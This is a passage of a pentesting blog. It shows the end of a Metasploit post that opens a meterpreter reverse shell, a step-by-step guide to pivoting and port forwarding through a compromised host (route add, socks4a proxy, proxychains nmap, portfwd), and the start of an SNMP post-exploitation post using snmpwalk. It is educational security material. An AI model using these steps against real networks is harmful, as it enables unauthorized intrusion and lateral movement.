<div class="separator" style="clear: both; text-align: left;">
I used this exploit and select windows meterpreter payload.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Now set the required values, RHOST=targetmachine, LHOST=attackerip, LPORT=attackerport.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQ44vndgBmD8j56ov7ailAkiS_my_tf7xI0EBJGPx8rAMPJNpYvvsK9BUF70kISJ1aMhRZcqGrtPPWrxosTHjXRrXGbFdWyVJDxNz_qVs7GEvDsJPrezf8MBPFAe1i64uTk3MuXB8sLJk/s1600/Screen+Shot+2017-04-10+at+11.11.55+AM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="346" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQ44vndgBmD8j56ov7ailAkiS_my_tf7xI0EBJGPx8rAMPJNpYvvsK9BUF70kISJ1aMhRZcqGrtPPWrxosTHjXRrXGbFdWyVJDxNz_qVs7GEvDsJPrezf8MBPFAe1i64uTk3MuXB8sLJk/s640/Screen+Shot+2017-04-10+at+11.11.55+AM.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
After setting all values, Hit exploit and press enter.</div>
<div class="separator" style="clear: both; text-align: left;">
If all goes well you will get a meterpreter reverse shell. :) </div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUYr0dyKAfc4OpvNb-0aivB8UvYc8Uf-CjFOHncdJV5QdjlS6w6RA2l2k21OtngA1ZQJYVzYqCu0X-gmyk107AcfNrCiySGfBnDKHTyNRu6Ijygh5xxwTUNiE2lsikVjtXJ48_C803MuE/s1600/Screen+Shot+2017-04-10+at+11.14.15+AM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="332" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUYr0dyKAfc4OpvNb-0aivB8UvYc8Uf-CjFOHncdJV5QdjlS6w6RA2l2k21OtngA1ZQJYVzYqCu0X-gmyk107AcfNrCiySGfBnDKHTyNRu6Ijygh5xxwTUNiE2lsikVjtXJ48_C803MuE/s640/Screen+Shot+2017-04-10+at+11.14.15+AM.png" width="640" /></a></div>
<br />
<div style="text-align: center;">
<br /></div>
</div>
Narendra Bhatihttp://www.blogger.com/profile/15834240919754131768noreply@blogger.com0tag:blogger.com,1999:blog-3462277729309057123.post-67194922248282634332017-04-10T14:57:00.001+05:302017-04-11T16:37:10.206+05:30Metasploit Pivoting And Port Forwarding : Attacking Network - Pentesting Network <div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiuMRwhPIZkrj1M0jWXZW2mG0D9uncEXV0vimZZWznm4VrPXgZhYoPTvoRrlEIxiTfnt-yWepNh7CmsQW6MKcEdq4tuzVFjqFNL0MbNMqsG5XKih2qToF0CbcT6bXyVzNG8J9Jfs3fNZYc/s1600/Screen+Shot+2017-04-10+at+3.04.06+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiuMRwhPIZkrj1M0jWXZW2mG0D9uncEXV0vimZZWznm4VrPXgZhYoPTvoRrlEIxiTfnt-yWepNh7CmsQW6MKcEdq4tuzVFjqFNL0MbNMqsG5XKih2qToF0CbcT6bXyVzNG8J9Jfs3fNZYc/s640/Screen+Shot+2017-04-10+at+3.04.06+PM.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<h2 style="clear: both; text-align: center;">
Metasploit Pivoting And Port Forwarding : Attacking Network - Pentesting Network </h2>
<div>
<br /></div>
<div>
<span style="background-color: white; color: #3a3a3a; font-family: "open sans" , sans-serif; font-size: 17px;">Metasploit pivot technique helps an attacker to Compromise the other Machines which attacker don`t have access to.</span></div>
<div>
<span style="background-color: white; color: #3a3a3a; font-family: "open sans" , sans-serif; font-size: 17px;"><br /></span></div>
<div>
<span style="background-color: white; color: #3a3a3a; font-family: "open sans" , sans-serif; font-size: 17px;">So the scenario would be like below.</span></div>
<div>
<span style="background-color: white; color: #3a3a3a; font-family: "open sans" , sans-serif; font-size: 17px;"><br /></span></div>
<div>
<span style="background-color: white; color: #3a3a3a; font-family: "open sans" , sans-serif; font-size: 17px;">Attacker: 192.168.23.X</span></div>
<div>
<span style="background-color: white; color: #3a3a3a; font-family: "open sans" , sans-serif; font-size: 17px;">Attacker Can Communicate With System A: 192.168.31.X</span></div>
<div>
<span style="background-color: white; color: #3a3a3a; font-family: "open sans" , sans-serif; font-size: 17px;">A System Can Only Communicate With B System : 10.1.1.X</span></div>
<div>
<span style="color: #3a3a3a; font-family: "open sans" , sans-serif;"><span style="background-color: white; font-size: 17px;">Attacker Wants To Communicate With Other Systems Using System B.</span></span><br />
<span style="color: #3a3a3a; font-family: "open sans" , sans-serif;"><span style="background-color: white; font-size: 17px;">We also consider that, attacker dont have idea about the System C IP Address.</span></span></div>
<div>
<span style="background-color: white; color: #3a3a3a; font-family: "open sans" , sans-serif; font-size: 17px;"><br /></span>
<span style="background-color: white; color: #3a3a3a; font-family: "open sans" , sans-serif; font-size: 17px;"><br /></span>
<span style="color: #3a3a3a; font-family: "open sans" , sans-serif;"><span style="background-color: white; font-size: 17px;">Pivoting can be achieved in below steps.</span></span><br />
<span style="color: #3a3a3a; font-family: "open sans" , sans-serif;"><span style="background-color: white; font-size: 17px;"><br /></span></span>
<br />
<div style="background-color: white; border: 0px; color: #3a3a3a; font-family: "Open Sans", sans-serif; font-size: 17px; margin-bottom: 1.5em; outline: 0px; padding: 0px;">
Pivoting can be perform in following steps:</div>
<ol style="background-color: white; border: 0px; color: #3a3a3a; font-family: "Open Sans", sans-serif; font-size: 17px; list-style-image: initial; list-style-position: initial; margin: 0px 0px 1.5em 3em; outline: 0px; padding: 0px;">
<li style="border: 0px; margin: 0px; outline: 0px; padding: 0px;">Compromise primary target machine (System A)</li>
<li style="border: 0px; margin: 0px; outline: 0px; padding: 0px;">Search for System network interfaces.</li>
<li style="border: 0px; margin: 0px; outline: 0px; padding: 0px;">Add route to metasploit session of System A.</li>
<li style="border: 0px; margin: 0px; outline: 0px; padding: 0px;">Run Proxy server</li>
<li style="border: 0px; margin: 0px; outline: 0px; padding: 0px;">Scan the Second target machine (System B)</li>
<li style="border: 0px; margin: 0px; outline: 0px; padding: 0px;">Port forwarding</li>
<li style="border: 0px; margin: 0px; outline: 0px; padding: 0px;">Perform Exploit</li>
</ol>
<div>
<a name='more'></a></div>
<div>
<br /></div>
<div>
<span style="color: #3a3a3a; font-family: "open sans" , sans-serif;"><span style="font-size: 17px;"><b>1) Compromise primary target machine (System A)</b></span></span></div>
</div>
<div>
<span style="color: #3a3a3a; font-family: "open sans" , sans-serif;"><span style="font-size: 17px;"><b><br /></b></span></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjHt7VxcZ1Um-_6qkeiwhaN8SnVyq9ghyphenhyphenwnmSjJkaHdF3ekbTIMHyzDeVWARZPZ6KwuLriryq04_qIMiUKoZPY8cPF5Uu_RdLEG8pJwK9q3HP32ol3NgdopxoZ2mDyU8IZdlck44Hbd1sg/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="190" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjHt7VxcZ1Um-_6qkeiwhaN8SnVyq9ghyphenhyphenwnmSjJkaHdF3ekbTIMHyzDeVWARZPZ6KwuLriryq04_qIMiUKoZPY8cPF5Uu_RdLEG8pJwK9q3HP32ol3NgdopxoZ2mDyU8IZdlck44Hbd1sg/s640/1.png" width="640" /></a></div>
<div>
<span style="color: #3a3a3a; font-family: "open sans" , sans-serif;"><span style="font-size: 17px;"><b><br /></b></span></span></div>
<div>
<span style="color: #3a3a3a; font-family: "open sans" , sans-serif;"><span style="font-size: 17px;"><b><br /></b></span></span></div>
<div>
<b><span style="color: #3a3a3a; font-family: "open sans" , sans-serif;"><span style="font-size: 17px;">2) </span></span><span style="background-color: white; color: #3a3a3a; font-family: "open sans" , sans-serif; font-size: 17px;">Search for System network interfaces</span></b></div>
<div>
<b><span style="background-color: white; color: #3a3a3a; font-family: "open sans" , sans-serif; font-size: 17px;"><br /></span></b></div>
<div>
<span style="background-color: white; color: #3a3a3a; font-family: "open sans" , sans-serif; font-size: 17px;">By looking below screen shot, we can say that machine we have exploit 192.168.31.X have a another Network Interface in Series of 10.1.1.0/24</span></div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEijTkKtCp0hU0d9gHUWPsGGUxm4euzhKp0J44EjaeGWTMYNngjT5NZFMCjPQur8d1Hgp4LHJFnsaPP5RFZw8ZhiSTqK1-SAKmIRBIreJiRDQQLec0weaEG3Vk1WPZ5DlpduKUeJnAzs1hA/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="480" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEijTkKtCp0hU0d9gHUWPsGGUxm4euzhKp0J44EjaeGWTMYNngjT5NZFMCjPQur8d1Hgp4LHJFnsaPP5RFZw8ZhiSTqK1-SAKmIRBIreJiRDQQLec0weaEG3Vk1WPZ5DlpduKUeJnAzs1hA/s640/1.png" width="640" /></a></div>
<div>
<b><span style="background-color: white; color: #3a3a3a; font-family: "open sans" , sans-serif; font-size: 17px;"><br /></span></b></div>
<div>
<b><span style="background-color: white; color: #3a3a3a; font-family: "open sans" , sans-serif; font-size: 17px;"><br /></span></b></div>
<div>
<div>
<span style="background-color: white; color: #3a3a3a; font-family: "open sans" , sans-serif; font-size: 17px;">To check which in this range are accessible to Machine A, We need run arp scanner.</span></div>
<div>
<span style="background-color: white; color: #3a3a3a; font-family: "open sans" , sans-serif; font-size: 17px;"><br /></span></div>
<div>
<span style="background-color: white; border: 0px; color: #3a3a3a; font-family: "open sans" , sans-serif; font-size: 17px; font-weight: 700; margin: 0px; outline: 0px; padding: 0px;">run arp_scanner -r IP address range</span></div>
</div>
<div>
<span style="background-color: white; border: 0px; color: #3a3a3a; font-family: "open sans" , sans-serif; font-size: 17px; font-weight: 700; margin: 0px; outline: 0px; padding: 0px;"><br /></span></div>
<div>
<span style="background-color: white; border: 0px; color: #3a3a3a; font-family: "open sans" , sans-serif; font-size: 17px; margin: 0px; outline: 0px; padding: 0px;">In this scan output, we found several machines and we have chosen one of them. </span></div>
<div>
<span style="background-color: white; border: 0px; color: #3a3a3a; font-family: "open sans" , sans-serif; font-size: 17px; margin: 0px; outline: 0px; padding: 0px;"><br /></span></div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXWYseKp04CRUq_v1PmC2risG8Ok-9_O1pZntfX4L-rRK1L1q6InEsDPLFRtMKaS3cpZLjVSjYi10dtY9cVLUupN8AaW0zrGODZ2h2bmShaW2tDvJ4UpC5CFbOJRSgZGGYBeeTpLwM9AM/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="388" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXWYseKp04CRUq_v1PmC2risG8Ok-9_O1pZntfX4L-rRK1L1q6InEsDPLFRtMKaS3cpZLjVSjYi10dtY9cVLUupN8AaW0zrGODZ2h2bmShaW2tDvJ4UpC5CFbOJRSgZGGYBeeTpLwM9AM/s640/1.png" width="640" /></a></div>
<div>
<span style="background-color: white; border: 0px; color: #3a3a3a; font-family: "open sans" , sans-serif; font-size: 17px; font-weight: 700; margin: 0px; outline: 0px; padding: 0px;"><br /></span></div>
<div>
<div>
<span style="color: #3a3a3a; font-family: "open sans" , sans-serif;"><span style="background-color: white; font-size: 17px;">In meterpreter hit "background" This will background our meterpreter shell and allow us to do perform further actions.</span></span></div>
</div>
<div>
<span style="color: #3a3a3a; font-family: "open sans" , sans-serif;"><span style="background-color: white; font-size: 17px;"><br /></span></span></div>
<div>
<span style="color: #3a3a3a; font-family: "open sans" , sans-serif;"><span style="background-color: white; font-size: 17px;">Now we need to add route on our Meterpreter Shell of System B ( 10.1.1.0/24) </span></span></div>
<div>
<br /></div>
<div>
<b><span style="background-color: white; color: #3a3a3a; font-family: "open sans" , sans-serif; font-size: 17px;"><br /></span></b></div>
<div>
<b><span style="background-color: white; color: #3a3a3a; font-family: "open sans" , sans-serif; font-size: 17px;">3) </span></b><span style="background-color: white; color: #3a3a3a; font-family: "open sans" , sans-serif; font-size: 17px;"><b>Add route to metasploit session of System A</b></span></div>
<div>
<span style="background-color: white; color: #3a3a3a; font-family: "open sans" , sans-serif; font-size: 17px;"><b><br /></b></span></div>
<div>
<span style="background-color: white; border: 0px; color: #3a3a3a; font-family: "open sans" , sans-serif; font-size: 17px; font-weight: 700; margin: 0px; outline: 0px; padding: 0px;">route add (ip_address) (subnet mask) (session_number)</span></div>
<div>
<span style="background-color: white; border: 0px; color: #3a3a3a; font-family: "open sans" , sans-serif; font-size: 17px; margin: 0px; outline: 0px; padding: 0px;">route add 10.1.1.0 255.255.255.0 1</span></div>
<div>
<br /></div>
<div>
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg0znKo2zh_c_UJB4ZEq_MCjHm7dgXHmIxRn7aorrX_j3P-8ts8YzndL2A-e9bWA1gzIQTYyeKuBYK-xxL5-puqV5TfnapvZJpfCpF66tTeoAHqny_Hfxa9nUBBRKYn_lth7R6fbnnxEkQ/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="108" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg0znKo2zh_c_UJB4ZEq_MCjHm7dgXHmIxRn7aorrX_j3P-8ts8YzndL2A-e9bWA1gzIQTYyeKuBYK-xxL5-puqV5TfnapvZJpfCpF66tTeoAHqny_Hfxa9nUBBRKYn_lth7R6fbnnxEkQ/s640/1.png" width="640" /></a></div>
<div>
<span style="background-color: white; color: #3a3a3a; font-family: "open sans" , sans-serif; font-size: 17px;"><b><br /></b></span></div>
<div>
<span style="background-color: white; color: #3a3a3a; font-family: "open sans" , sans-serif; font-size: 17px;"><b><br /></b></span></div>
<div>
<span style="color: #3a3a3a; font-family: "open sans" , sans-serif;"><span style="background-color: white; font-size: 17px;">Now our meterpreter shell can communicate any of the machine in the series of 10.1.1.X.</span></span></div>
<div>
<span style="color: #3a3a3a; font-family: "open sans" , sans-serif;"><span style="background-color: white; font-size: 17px;"><br /></span></span></div>
<div>
<span style="background-color: white; font-weight: 700;">4) </span><span style="background-color: white; color: #3a3a3a; font-family: "open sans" , sans-serif; font-size: 17px; font-weight: 700;">Run Proxy server</span></div>
<div>
<br /></div>
<div>
<span style="color: #3a3a3a; font-family: "open sans" , sans-serif;"><span style="background-color: white; font-size: 17px;">Proxy server will create a tunnel which allow metasploit and other tools to do interact Via Meterpreter Shell on System B (10.1.1.X) w</span></span></div>
<div>
<span style="color: #3a3a3a; font-family: "open sans" , sans-serif;"><span style="background-color: white; font-size: 17px;"><br /></span></span></div>
<div>
<span style="background-color: white; border: 0px; color: #3a3a3a; font-family: "open sans" , sans-serif; font-size: 17px; font-weight: 700; margin: 0px; outline: 0px; padding: 0px;">use auxiliary/server/socks4a</span></div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMV3Zj1FX8VRZkq-HZoKxxXchc3Rj4djAj1XHc8BqkhYOUwrNtnOdfDLSyjpEnoCxEbUktkT5UfxfzXJ-HHoyivN6vV2dV_ny5RhTJPusVG4UKz2YE523qCmiwU545M2LP7bafLVvZDAw/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="132" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMV3Zj1FX8VRZkq-HZoKxxXchc3Rj4djAj1XHc8BqkhYOUwrNtnOdfDLSyjpEnoCxEbUktkT5UfxfzXJ-HHoyivN6vV2dV_ny5RhTJPusVG4UKz2YE523qCmiwU545M2LP7bafLVvZDAw/s640/1.png" width="640" /></a></div>
<div>
<span style="color: #3a3a3a; font-family: "open sans" , sans-serif;"><span style="background-color: white; font-size: 17px;"><br /></span></span></div>
<div>
<span style="color: #3a3a3a; font-family: "open sans" , sans-serif;"><span style="background-color: white; font-size: 17px;"><b>5) </b></span></span><span style="background-color: white; color: #3a3a3a; font-family: "open sans" , sans-serif; font-size: 17px; font-weight: 700;">Scan the Secondary target machine (System B)</span></div>
<div>
<span style="background-color: white; color: #3a3a3a; font-family: "open sans" , sans-serif; font-size: 17px; font-weight: 700;"><br /></span></div>
<div>
<span style="color: #3a3a3a; font-family: "open sans" , sans-serif;"><span style="background-color: white; font-size: 17px;"><b>Nmap comes handy for port scan, We can use below command to perform a Port Scan</b></span></span></div>
<div>
<span style="color: #3a3a3a; font-family: "open sans" , sans-serif;"><span style="background-color: white; font-size: 17px;"><b><br /></b></span></span></div>
<div>
<span style="background-color: white; border: 0px; color: #3a3a3a; font-family: "open sans" , sans-serif; font-size: 17px; font-weight: 700; margin: 0px; outline: 0px; padding: 0px;">proxychains nmap -sTV -p(port range) -n -PN (ip address of system B)</span></div>
<div>
<span style="background-color: white; border: 0px; color: #3a3a3a; font-family: "open sans" , sans-serif; font-size: 17px; font-weight: 700; margin: 0px; outline: 0px; padding: 0px;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgv4XVlR_kAy9axfv3GgK5Nm5QGLW3bQ4eQP9PKUGFlyWkMOLXa3tguoftg23UCvNfnXhyphenhyphena7YdEvnqELM8edwiBLhF3qtVCJZvvInSMHdDy97ybalYRghVzpA5eDKO6947NWH1uh2GHIQQ/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="572" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgv4XVlR_kAy9axfv3GgK5Nm5QGLW3bQ4eQP9PKUGFlyWkMOLXa3tguoftg23UCvNfnXhyphenhyphena7YdEvnqELM8edwiBLhF3qtVCJZvvInSMHdDy97ybalYRghVzpA5eDKO6947NWH1uh2GHIQQ/s640/1.png" width="640" /></a></div>
<div>
<span style="background-color: white; border: 0px; color: #3a3a3a; font-family: "open sans" , sans-serif; font-size: 17px; font-weight: 700; margin: 0px; outline: 0px; padding: 0px;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjY5SNeGn7zo6x6IN5qjBFsJU-LMEMIvM_xDQw_o9g4N32M6zsD55811s95J-tBEL0LTCGzvRqSGMpzCGIi0GUFa8vhwK_kBqaM16VckTZiN_bi81Esx5McrNYymcw2xIeHoVvXdnzJU6M/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="174" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjY5SNeGn7zo6x6IN5qjBFsJU-LMEMIvM_xDQw_o9g4N32M6zsD55811s95J-tBEL0LTCGzvRqSGMpzCGIi0GUFa8vhwK_kBqaM16VckTZiN_bi81Esx5McrNYymcw2xIeHoVvXdnzJU6M/s640/1.png" width="640" /></a></div>
<div>
<span style="background-color: white; border: 0px; color: #3a3a3a; font-family: "open sans" , sans-serif; font-size: 17px; font-weight: 700; margin: 0px; outline: 0px; padding: 0px;"><br /></span></div>
<div>
<span style="color: #3a3a3a; font-family: "open sans" , sans-serif;"><span style="background-color: white; font-size: 17px;"><br /></span></span></div>
<div>
<span style="background-color: white; color: #3a3a3a; font-family: "open sans" , sans-serif; font-size: 17px;">Below output "Ok" indicate the open status of port and "Denied" indicated close status.</span></div>
<div>
<span style="background-color: white; color: #3a3a3a; font-family: "open sans" , sans-serif; font-size: 17px;">Ex. port 4001 is open.</span></div>
<div>
<span style="background-color: white; border: 0px; color: #3a3a3a; font-family: "open sans" , sans-serif; font-size: 17px; margin: 0px; outline: 0px; padding: 0px;"></span><br />
<div style="font-weight: 700;">
<span style="background-color: white; border: 0px; color: #3a3a3a; font-family: "open sans" , sans-serif; font-size: 17px; margin: 0px; outline: 0px; padding: 0px;"><span style="color: #3a3a3a; font-family: "open sans" , sans-serif;"><span style="font-size: 17px;"><br /></span></span></span></div>
<span style="background-color: white; border: 0px; color: #3a3a3a; font-family: "open sans" , sans-serif; font-size: 17px; margin: 0px; outline: 0px; padding: 0px;">
</span>
<br />
<div style="font-weight: 700;">
<span style="background-color: white; border: 0px; color: #3a3a3a; font-family: "open sans" , sans-serif; font-size: 17px; margin: 0px; outline: 0px; padding: 0px;"><span style="font-weight: normal;">Now interact with your background session in metasploit using session interaction command.</span></span></div>
<span style="background-color: white; border: 0px; color: #3a3a3a; font-family: "open sans" , sans-serif; font-size: 17px; margin: 0px; outline: 0px; padding: 0px;">
</span>
<br />
<div style="font-weight: 700;">
<span style="background-color: white; border: 0px; color: #3a3a3a; font-family: "open sans" , sans-serif; font-size: 17px; margin: 0px; outline: 0px; padding: 0px;"><span style="font-weight: normal;"><br /></span></span></div>
<span style="background-color: white; border: 0px; color: #3a3a3a; font-family: "open sans" , sans-serif; font-size: 17px; margin: 0px; outline: 0px; padding: 0px;">
</span>
<br />
<div>
<span style="background-color: white; border: 0px; color: #3a3a3a; font-family: "open sans" , sans-serif; font-size: 17px; margin: 0px; outline: 0px; padding: 0px;"><b>session -i sessionnumber</b></span></div>
<span style="background-color: white; border: 0px; color: #3a3a3a; font-family: "open sans" , sans-serif; font-size: 17px; margin: 0px; outline: 0px; padding: 0px;">
</span>
<div>
<span style="background-color: white; border: 0px; color: #3a3a3a; font-family: "open sans" , sans-serif; font-size: 17px; margin: 0px; outline: 0px; padding: 0px;"><b><br /></b></span></div>
<span style="background-color: white; border: 0px; color: #3a3a3a; font-family: "open sans" , sans-serif; font-size: 17px; margin: 0px; outline: 0px; padding: 0px;">
<div>
<b>6) </b><span style="font-weight: 700;">Port forwarding</span></div>
<div>
<span style="font-weight: 700;"><br /></span></div>
<div>
<span style="border: 0px; font-weight: 700; margin: 0px; outline: 0px; padding: 0px;">Command</span> : <span style="border: 0px; font-weight: 700; margin: 0px; outline: 0px; padding: 0px;">portfwd add -l (your system port) -p (target system port) -r (target system ip address)</span></div>
<div>
<span style="border: 0px; font-weight: 700; margin: 0px; outline: 0px; padding: 0px;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgkQ_RYt7BLuZR7EbDkIYN39w6YqEXdDvaT3zlBujEieQQQo57GWXXJbFAocaIhlcJNLeO2qc_vILhycuy5fDdJUqc0CRI2hpzkoSrRW3nptvKQuDDSKPDWhwgKjZaOJI2157Jr2NGg8VM/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="284" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgkQ_RYt7BLuZR7EbDkIYN39w6YqEXdDvaT3zlBujEieQQQo57GWXXJbFAocaIhlcJNLeO2qc_vILhycuy5fDdJUqc0CRI2hpzkoSrRW3nptvKQuDDSKPDWhwgKjZaOJI2157Jr2NGg8VM/s640/1.png" width="640" /></a></div>
<div>
<span style="border: 0px; font-weight: 700; margin: 0px; outline: 0px; padding: 0px;"><br /></span></div>
<div>
Now we can access System C Port 4001 Web Application using our localhost ip.</div>
<div>
<b><br /></b></div>
<div>
<b><br /></b></div>
</span></div>
<div>
<span style="background-color: white; border: 0px; color: #3a3a3a; font-family: "open sans" , sans-serif; font-size: 17px; font-weight: 700; margin: 0px; outline: 0px; padding: 0px;"><br /></span></div>
<div>
<span style="background-color: white; color: #3a3a3a; font-family: "open sans" , sans-serif; font-size: 17px; font-weight: 700;"><br /></span></div>
<div>
<span style="background-color: white; color: #3a3a3a; font-family: "open sans" , sans-serif; font-size: 17px;"><b><br /></b></span></div>
<div>
<span style="color: #3a3a3a; font-family: "open sans" , sans-serif;"><span style="font-size: 17px;"><br /></span></span></div>
<div>
<span style="color: #3a3a3a; font-family: "open sans" , sans-serif;"><span style="font-size: 17px;"><br /></span></span></div>
<div>
<span style="background-color: white; color: #3a3a3a; font-family: "open sans" , sans-serif; font-size: 17px;"><br /></span></div>
<div>
<br /></div>
<br /></div>
Narendra Bhatihttp://www.blogger.com/profile/15834240919754131768noreply@blogger.com0tag:blogger.com,1999:blog-3462277729309057123.post-22281710863594246942017-04-10T00:23:00.001+05:302017-04-11T16:37:22.220+05:30Hacking SNMP Service Part 2 - The Post Exploitation : Attacking Network - Network Pentesting<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4faJH4HPssPfJiG9vSDERsFxCt-zCIizxckjGdJA0E58xD7Dcb89gfiiv-sJPQmgGhDzQvhk2qsGm97iWgfRDvDJ3tQb7YeJa4BkO3Lu3r9Z_u49fWeBB-ZQjgUshz3FxRAr6qQuxoGI/s1600/Screen+Shot+2017-04-09+at+10.51.11+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="190" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4faJH4HPssPfJiG9vSDERsFxCt-zCIizxckjGdJA0E58xD7Dcb89gfiiv-sJPQmgGhDzQvhk2qsGm97iWgfRDvDJ3tQb7YeJa4BkO3Lu3r9Z_u49fWeBB-ZQjgUshz3FxRAr6qQuxoGI/s640/Screen+Shot+2017-04-09+at+10.51.11+PM.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<h2 style="clear: both; text-align: center;">
Hacking SNMP Service Part 2 - The Post Exploitation : Attacking Network - Network Pentesting</h2>
<div>
From our previous <a href="http://www.websecgeeks.com/2017/04/hacking-snmp-service-part-1-post.html" target="_blank">post</a>, We have identified the community strings Via Nmap Scan & Brute Forcing the Community String Values.<br />
<br />
Now we will see, How can we use those Extracted Community strings for Post Exploitation.<br />
<br />
To perform We will use various tools as mention below.<br />
<br />
<div class="separator" style="clear: both;">
<b>What Is MIB in SNMP</b></div>
<div class="separator" style="clear: both;">
<br /></div>
<div class="separator" style="clear: both;">
The SNMP Management Information Base (MIB) is a database containing information</div>
<div class="separator" style="clear: both;">
usually related to network management. The database is organized like a tree, where</div>
<div class="separator" style="clear: both;">
branches represent different organizations or network functions. The leaves of the tree</div>
<div class="separator" style="clear: both;">
(final endpoints) correspond to specific variable values that can then be accessed, and</div>
<div class="separator" style="clear: both;">
probed, by an external user. To read more about the MIB tree, refer to the following</div>
<div class="separator" style="clear: both;">
<br /></div>
<div class="separator" style="clear: both;">
<a href="http://publib.boulder.ibm.com/infocenter/pseries/v5r3/index.jsp?topic=/com.ibm.">http://publib.boulder.ibm.com/infocenter/pseries/v5r3/index.jsp?topic=/com.ibm.</a></div>
<div class="separator" style="clear: both;">
</div>
<div class="separator" style="clear: both;">
<a href="http://aix.progcomm/doc/progcomc/mib.htm">aix.progcomm/doc/progcomc/mib.htm</a></div>
<div>
<br /></div>
<div>
<div>
For example, the following MIB values correspond to specific Microsoft Windows</div>
<div>
SNMP parameters.</div>
<div>
1.3.6.1.2.1.25.1.6.0 <b>System Processes</b></div>
<div>
1.3.6.1.2.1.25.4.2.1.2 <b>Running Programs</b></div>
<div>
1.3.6.1.2.1.25.4.2.1.4 <b>Processes Path</b></div>
<div>
1.3.6.1.2.1.25.2.3.1.4 <b>Storage Units</b></div>
<div>
1.3.6.1.2.1.25.6.3.1.2 <b>Software Name</b></div>
<div>
1.3.6.1.4.1.77.1.2.25 <b>User Accounts</b></div>
<div>
1.3.6.1.2.1.6.13.1.3 <b>TCP LocalPorts</b><br />
<b><br /></b>
<b></b><br />
<a name='more'></a><br /></div>
</div>
<div>
<b>A) SNAMPWALK</b><br />
We already got our community strings as "mike", Now we are passing this to SNMPWALK tools followed by out target IP. which will extract the information all possible information from SNMP service.</div>
<div>
<b><br /></b></div>
<br />
<br />
<b>snmpwalk -v1 -c mike 192.168.131.135</b><br />
<b><br /></b>
<br />
<div class="separator" style="clear: both; text-align: center;">
